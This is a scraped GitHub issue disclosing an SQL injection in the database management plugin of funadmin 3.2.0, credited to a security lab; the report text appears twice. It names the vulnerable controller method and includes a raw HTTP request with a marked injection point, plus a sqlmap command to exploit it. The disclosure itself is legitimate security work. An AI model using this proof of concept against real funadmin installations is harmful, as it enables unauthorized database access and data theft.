We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details: Database management plug-in database.php list-sql injection vulnerability Vulnerability occurs in plugin - database management plugin
Code Audit Process Vulnerability occurs in app\databases\controller\Database.php#list method Get the id directly and splice it into the sql statement
Vulnerability reproduction: Background administrator rights sqlmap poc save as txt `POST /databases/database/list?id=* HTTP/1.1 Host: 192.168.3.129:8092 Content-Length: 187 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close
TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539` python sqlmap.py -r poc.txt
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
Vulnerability Product:funadmin
![image](https://user-images.githubusercontent.com/122217858/215309557-77269b4a-a097-44fb-86d3-e4c556a533bb.png)
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Database management plug-in database.php list-sql injection vulnerability
Vulnerability occurs in plugin - database management plugin
Code Audit Process
![image](https://user-images.githubusercontent.com/122217858/215309573-0fd6bf28-3a59-4921-9aab-8a35ca9ec811.png)
![image](https://user-images.githubusercontent.com/122217858/215309590-b960654d-3a42-4ae2-9a36-f71498a519fc.png)
Vulnerability occurs in
app\databases\controller\Database.php#list method
Get the id directly and splice it into the sql statement
Vulnerability reproduction:
Background administrator rights
sqlmap poc save as txt
`POST /databases/database/list?id=* HTTP/1.1
Host: 192.168.3.129:8092
Content-Length: 187
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:8092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D
Connection: close
TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539`
![image](https://user-images.githubusercontent.com/122217858/215309621-6b1b745d-6b16-4e3e-b48c-b0693bca3f9f.png)
python sqlmap.py -r poc.txt
The text was updated successfully, but these errors were encountered: